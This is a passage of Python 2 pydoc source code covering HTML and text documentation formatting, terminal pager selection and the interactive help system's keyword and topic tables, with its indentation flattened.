def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', _binstr(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', _binstr(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', _binstr(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not hasattr(sys.stdin, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(_encode(text))
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(_encode(text))
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
try:
h = int(os.environ.get('LINES', 0))
except ValueError:
h = 0
if h <= 1:
h = 25
r = inc = h - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding)))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if object is None:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
